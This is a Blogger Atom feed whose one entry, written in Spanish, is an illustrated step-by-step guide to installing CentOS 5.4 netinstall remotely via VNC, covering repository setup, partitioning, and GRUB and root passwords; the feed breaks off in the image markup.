<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;CEQMQX0_fCp7ImA9WhRbFks.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484</id><updated>2012-02-07T16:53:00.344-08:00</updated><category term="Virtualización" /><category term="Seguridad" /><category term="Windows" /><category term="Monitoreo" /><category term="Linux" /><category term="Scripts" /><title>redes-seguridad</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.redes-seguridad.com.ar/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>141</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Redes-seguridad" /><feedburner:info uri="redes-seguridad" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;AkMMSX08eSp7ImA9WhRbFEs.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-4746417799290076477</id><published>2012-02-05T08:00:00.000-08:00</published><updated>2012-02-05T11:01:28.371-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-05T11:01:28.371-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>Instalando CentOS-5.4 netinstall remotamente (VNC)</title><content type="html">Descargamos &lt;a href="http://vault.centos.org/5.4/isos/i386"&gt;CentOS-5.4-i386-netinstall.iso&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-24pNVgzNLlU/Ty6ofA27ORI/AAAAAAAAA78/oKiDk4R_kFA/s1600/01.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 226px; height: 320px;" src="http://4.bp.blogspot.com/-24pNVgzNLlU/Ty6ofA27ORI/AAAAAAAAA78/oKiDk4R_kFA/s320/01.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705683028684781842" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Grabamos la iso en un CD y luego lo ponemos en la lectora, indicamos que arranque de cdroom y nos aparecerá lo siguiente. Luego tipearemos "&lt;span style="font-weight:bold;"&gt;linux text&lt;/span&gt;" y daremos &lt;span style="font-weight:bold;"&gt;ENTER&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-EQ9UYFXL97Q/Ty6o-lUZUcI/AAAAAAAAA8I/x2041mXMgvo/s1600/02.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 274px;" src="http://4.bp.blogspot.com/-EQ9UYFXL97Q/Ty6o-lUZUcI/AAAAAAAAA8I/x2041mXMgvo/s320/02.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5705683571048010178" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Seleccionamos el lenguaje de instalación:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-9qyTygGbA58/Ty6pli7mdQI/AAAAAAAAA8U/EeCL-1l-MJY/s1600/03.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 265px; height: 232px;" src="http://1.bp.blogspot.com/-9qyTygGbA58/Ty6pli7mdQI/AAAAAAAAA8U/EeCL-1l-MJY/s320/03.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705684240422040834" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;El tipo de teclado:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-dDggLXie1ss/Ty6p7gvzcII/AAAAAAAAA8g/dGPLOS9lAb0/s1600/04.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 246px; height: 215px;" src="http://2.bp.blogspot.com/-dDggLXie1ss/Ty6p7gvzcII/AAAAAAAAA8g/dGPLOS9lAb0/s320/04.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5705684617792811138" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;El tipo del repositorio, elegimos en nuestro caso HTTP:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-WuQ5iWwSUZw/Ty6qLsaoEyI/AAAAAAAAA8s/R48cPQejs44/s1600/05.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 243px; height: 191px;" src="http://3.bp.blogspot.com/-WuQ5iWwSUZw/Ty6qLsaoEyI/AAAAAAAAA8s/R48cPQejs44/s320/05.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5705684895803118370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;La configuración TCP/Ip, si deseamos ip fija, dhcp, ipv4 ó ipv6:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-ZKFR-TD7y2o/Ty6qYqFBTiI/AAAAAAAAA84/D5K-jHDwQRE/s1600/06.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 181px;" src="http://4.bp.blogspot.com/-ZKFR-TD7y2o/Ty6qYqFBTiI/AAAAAAAAA84/D5K-jHDwQRE/s320/06.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705685118513925666" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Indicamos la página y el directorio del repositorio de paquetes:&lt;br /&gt;&lt;br /&gt;Nombre del sitio web: &lt;span style="font-weight:bold;"&gt;vault.centos.org&lt;/span&gt;&lt;br /&gt;Directorio CentOS: &lt;span style="font-weight:bold;"&gt;/5.4/os/i386&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-66deF0psipU/Ty6q1ayaORI/AAAAAAAAA9E/1j_kgovrklc/s1600/07.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 188px;" src="http://4.bp.blogspot.com/-66deF0psipU/Ty6q1ayaORI/AAAAAAAAA9E/1j_kgovrklc/s320/07.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705685612625541394" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Comienza la recuperación de paquetes:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-mHQ5PoBbnt8/Ty6rPOUvQGI/AAAAAAAAA9Q/ps31itTZgJs/s1600/08.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 45px;" src="http://4.bp.blogspot.com/-mHQ5PoBbnt8/Ty6rPOUvQGI/AAAAAAAAA9Q/ps31itTZgJs/s320/08.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5705686055956463714" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Indicamos que vamos a seguir la instalación remotamente por VNC, luego nos solicitará la password para conectarnos remotamente:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-fbbI9B6Ln0g/Ty6rizRHfUI/AAAAAAAAA9c/xcAE65STBEs/s1600/09.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://3.bp.blogspot.com/-fbbI9B6Ln0g/Ty6rizRHfUI/AAAAAAAAA9c/xcAE65STBEs/s320/09.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705686392290901314" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Veremos en pantalla que nos indica la &lt;span style="font-weight:bold;"&gt;ip:sesión&lt;/span&gt; (192.168.1.100:1) a la cual nos conectaremos por VNC para seguir la instalación remota:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-u1qz8A1aWt4/Ty6sbHeM2XI/AAAAAAAAA9o/2oa9lLvaN3Y/s1600/10.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://1.bp.blogspot.com/-u1qz8A1aWt4/Ty6sbHeM2XI/AAAAAAAAA9o/2oa9lLvaN3Y/s320/10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705687359787161970" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Descargamos el cliente VNC (&lt;a href="www.tightvnc.com/download-old.php"&gt;vncviewer&lt;/a&gt;):&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-rD4cNIbpNFs/Ty6sy-WibxI/AAAAAAAAA90/HGPbsmko0Oc/s1600/ScreenHunter_35%2BFeb.%2B05%2B12.30.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 230px;" src="http://2.bp.blogspot.com/-rD4cNIbpNFs/Ty6sy-WibxI/AAAAAAAAA90/HGPbsmko0Oc/s320/ScreenHunter_35%2BFeb.%2B05%2B12.30.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705687769655963410" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Lo ejecutamos y nos solicitará la ip:sesion (192.168.0.1:1), ingresamos el password que pusimos previamente y comienza la instalación remota:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-4u9GSU6nmQ8/Ty6tPh5WS7I/AAAAAAAAA-A/XZ6RshZlRSc/s1600/ScreenHunter_52%2BFeb.%2B05%2B13.24.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 141px;" src="http://1.bp.blogspot.com/-4u9GSU6nmQ8/Ty6tPh5WS7I/AAAAAAAAA-A/XZ6RshZlRSc/s320/ScreenHunter_52%2BFeb.%2B05%2B13.24.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705688260233546674" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Siguiente:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-ggqfg4yoXUw0/Ty6teH2pepI/AAAAAAAAA-M/6ANLEQkR9XQ/s1600/ScreenHunter_35%2BFeb.%2B05%2B12.33.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-ggqg4yoXUw0/Ty6teH2pepI/AAAAAAAAA-M/6ANLEQkR9XQ/s320/ScreenHunter_35%2BFeb.%2B05%2B12.33.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705688510940936850" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Suprimimos las particiones existentes, tildamos revisar las particiones y click en siguiente:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-79dm9Rl1gg8/Ty6txlcIV-I/AAAAAAAAA-Y/Xu3DODIIG4U/s1600/ScreenHunter_35%2BFeb.%2B05%2B12.35.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://3.bp.blogspot.com/-79dm9Rl1gg8/Ty6txlcIV-I/AAAAAAAAA-Y/Xu3DODIIG4U/s320/ScreenHunter_35%2BFeb.%2B05%2B12.35.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705688845300291554" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Confirmamos que deseamos borrarla:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-EEvxAH-Ko8I/Ty6t9t4XpZI/AAAAAAAAA-k/gfCQf_0BdY8/s1600/ScreenHunter_36%2BFeb.%2B05%2B12.35.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-EEvxAH-Ko8I/Ty6t9t4XpZI/AAAAAAAAA-k/gfCQf_0BdY8/s320/ScreenHunter_36%2BFeb.%2B05%2B12.35.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705689053724648850" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Modificamos las particiones según nuestra conveniencia, yo lo dejo por defecto para este instructivo, pero deberían cambiarlo:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-KfJ1TCwk-xM/Ty6uLSi48vI/AAAAAAAAA-w/6Aw7dplpA_0/s1600/ScreenHunter_37%2BFeb.%2B05%2B12.39.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-KfJ1TCwk-xM/Ty6uLSi48vI/AAAAAAAAA-w/6Aw7dplpA_0/s320/ScreenHunter_37%2BFeb.%2B05%2B12.39.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705689286904967922" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Indicamos donde queremos instalar el grub:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-6G4h5Inst7M/Ty6ukxXeqbI/AAAAAAAAA-8/YyEhideyd4U/s1600/ScreenHunter_37%2BFeb.%2B05%2B12.44.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-6G4h5Inst7M/Ty6ukxXeqbI/AAAAAAAAA-8/YyEhideyd4U/s320/ScreenHunter_37%2BFeb.%2B05%2B12.44.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705689724675336626" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Le colocamos password al gestor de arranque:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-T0OqEfnVCP8/Ty6uwGLVT3I/AAAAAAAAA_I/GZ8SsMsWrvg/s1600/ScreenHunter_37%2BFeb.%2B05%2B12.46.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-T0OqEfnVCP8/Ty6uwGLVT3I/AAAAAAAAA_I/GZ8SsMsWrvg/s320/ScreenHunter_37%2BFeb.%2B05%2B12.46.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705689919240097650" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Nos da otra opción por si queremos modificar la interface de red ó configurar otra:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-J6ZmWf4EqJ0/Ty6vIhOsJQI/AAAAAAAAA_U/gMWqCOMS7a8/s1600/ScreenHunter_39%2BFeb.%2B05%2B12.46.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://3.bp.blogspot.com/-J6ZmWf4EqJ0/Ty6vIhOsJQI/AAAAAAAAA_U/gMWqCOMS7a8/s320/ScreenHunter_39%2BFeb.%2B05%2B12.46.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705690338818794754" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Seleccionamos la región:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-z1OrF-qimqc/Ty6vVFjJR5I/AAAAAAAAA_g/hmUVyecuSvc/s1600/ScreenHunter_39%2BFeb.%2B05%2B12.47.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-z1OrF-qimqc/Ty6vVFjJR5I/AAAAAAAAA_g/hmUVyecuSvc/s320/ScreenHunter_39%2BFeb.%2B05%2B12.47.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705690554726696850" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ingresamos la contraseña de root:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-xbizihovCro/Ty6vhBoMeqI/AAAAAAAAA_s/zvvLMIf4wOs/s1600/ScreenHunter_40%2BFeb.%2B05%2B12.47.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://1.bp.blogspot.com/-xbizihovCro/Ty6vhBoMeqI/AAAAAAAAA_s/zvvLMIf4wOs/s320/ScreenHunter_40%2BFeb.%2B05%2B12.47.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705690759832566434" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Destildamos que instale entornos gráficos y seleccionamos la personalización de paquetes:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-zL_-Z_ccieg/Ty6v_YsPL5I/AAAAAAAAA_4/a0dwTMbO4F4/s1600/ScreenHunter_41%2BFeb.%2B05%2B12.49.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://1.bp.blogspot.com/-zL_-Z_ccieg/Ty6v_YsPL5I/AAAAAAAAA_4/a0dwTMbO4F4/s320/ScreenHunter_41%2BFeb.%2B05%2B12.49.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705691281419612050" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Entornos de escritorio, todo destildado:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-x_kXo8OUFv8/Ty6wWtSurfI/AAAAAAAABAE/9nOm1VOUNiI/s1600/ScreenHunter_41%2BFeb.%2B05%2B12.50.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://1.bp.blogspot.com/-x_kXo8OUFv8/Ty6wWtSurfI/AAAAAAAABAE/9nOm1VOUNiI/s320/ScreenHunter_41%2BFeb.%2B05%2B12.50.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705691682086759922" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Editores, sólo el vim:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-dMKFNIdsdeg/Ty6wiL67tvI/AAAAAAAABAQ/x3hky1UZmcg/s1600/ScreenHunter_42%2BFeb.%2B05%2B12.50.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://4.bp.blogspot.com/-dMKFNIdsdeg/Ty6wiL67tvI/AAAAAAAABAQ/x3hky1UZmcg/s320/ScreenHunter_42%2BFeb.%2B05%2B12.50.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705691879287011058" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-OrIR3HM9bE8/Ty6wpiq_XZI/AAAAAAAABAc/hFzTQbWr3io/s1600/ScreenHunter_42%2BFeb.%2B05%2B12.51.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-OrIR3HM9bE8/Ty6wpiq_XZI/AAAAAAAABAc/hFzTQbWr3io/s320/ScreenHunter_42%2BFeb.%2B05%2B12.51.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705692005653241234" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Y los demás paquetes por defecto como vienen:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-4PmgIWmVy7A/Ty6xEOTz7oI/AAAAAAAABAo/GLZX-3mpo08/s1600/ScreenHunter_43%2BFeb.%2B05%2B12.51.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://4.bp.blogspot.com/-4PmgIWmVy7A/Ty6xEOTz7oI/AAAAAAAABAo/GLZX-3mpo08/s320/ScreenHunter_43%2BFeb.%2B05%2B12.51.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705692464043781762" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-4-lPWKc7PII/Ty6xNDesVyI/AAAAAAAABA0/Hqi39rzcgaA/s1600/ScreenHunter_45%2BFeb.%2B05%2B12.51.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://1.bp.blogspot.com/-4-lPWKc7PII/Ty6xNDesVyI/AAAAAAAABA0/Hqi39rzcgaA/s320/ScreenHunter_45%2BFeb.%2B05%2B12.51.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705692615755454242" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-4uVhg9Wv8rM/Ty6xTzAdNPI/AAAAAAAABBA/KZgBmkkZ1fk/s1600/ScreenHunter_46%2BFeb.%2B05%2B12.51.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://1.bp.blogspot.com/-4uVhg9Wv8rM/Ty6xTzAdNPI/AAAAAAAABBA/KZgBmkkZ1fk/s320/ScreenHunter_46%2BFeb.%2B05%2B12.51.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705692731592750322" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-H-IxvxGwOzg/Ty6xbzWsTUI/AAAAAAAABBM/LDq13e7pXsc/s1600/ScreenHunter_46%2BFeb.%2B05%2B12.52.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://4.bp.blogspot.com/-H-IxvxGwOzg/Ty6xbzWsTUI/AAAAAAAABBM/LDq13e7pXsc/s320/ScreenHunter_46%2BFeb.%2B05%2B12.52.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705692869124967746" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-PYWb0lo-eVs/Ty6xii-dqbI/AAAAAAAABBY/hsQngzj133A/s1600/ScreenHunter_47%2BFeb.%2B05%2B12.52.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://4.bp.blogspot.com/-PYWb0lo-eVs/Ty6xii-dqbI/AAAAAAAABBY/hsQngzj133A/s320/ScreenHunter_47%2BFeb.%2B05%2B12.52.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705692984987462066" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-bJ3P8zzTXnw/Ty6yB8eGrdI/AAAAAAAABBk/fvlT3WsKOIY/s1600/ScreenHunter_48%2BFeb.%2B05%2B12.52.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://2.bp.blogspot.com/-bJ3P8zzTXnw/Ty6yB8eGrdI/AAAAAAAABBk/fvlT3WsKOIY/s320/ScreenHunter_48%2BFeb.%2B05%2B12.52.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705693524407004626" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-w7NbuHdja-E/Ty6yJ8kBHgI/AAAAAAAABBw/6wDvu6Y9EYo/s1600/ScreenHunter_49%2BFeb.%2B05%2B12.52.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://1.bp.blogspot.com/-w7NbuHdja-E/Ty6yJ8kBHgI/AAAAAAAABBw/6wDvu6Y9EYo/s320/ScreenHunter_49%2BFeb.%2B05%2B12.52.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705693661870759426" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-6MyuBB6v338/Ty6yTJlarNI/AAAAAAAABB8/sTQL5B4vq_Q/s1600/ScreenHunter_50%2BFeb.%2B05%2B12.52.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://3.bp.blogspot.com/-6MyuBB6v338/Ty6yTJlarNI/AAAAAAAABB8/sTQL5B4vq_Q/s320/ScreenHunter_50%2BFeb.%2B05%2B12.52.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705693819985112274" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Siguiente:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-ywCI0F5gJ8M/Ty6ybmn9MHI/AAAAAAAABCI/lHTxTU0PXPc/s1600/ScreenHunter_51%2BFeb.%2B05%2B12.54.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://4.bp.blogspot.com/-ywCI0F5gJ8M/Ty6ybmn9MHI/AAAAAAAABCI/lHTxTU0PXPc/s320/ScreenHunter_51%2BFeb.%2B05%2B12.54.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705693965219344498" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Y comienza la instalación:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-_0SZGJVzBvE/Ty6ylsCMxlI/AAAAAAAABCU/X7afN98N71Y/s1600/ScreenHunter_52%2BFeb.%2B05%2B12.54.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 261px;" src="http://3.bp.blogspot.com/-_0SZGJVzBvE/Ty6ylsCMxlI/AAAAAAAABCU/X7afN98N71Y/s320/ScreenHunter_52%2BFeb.%2B05%2B12.54.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5705694138470286930" 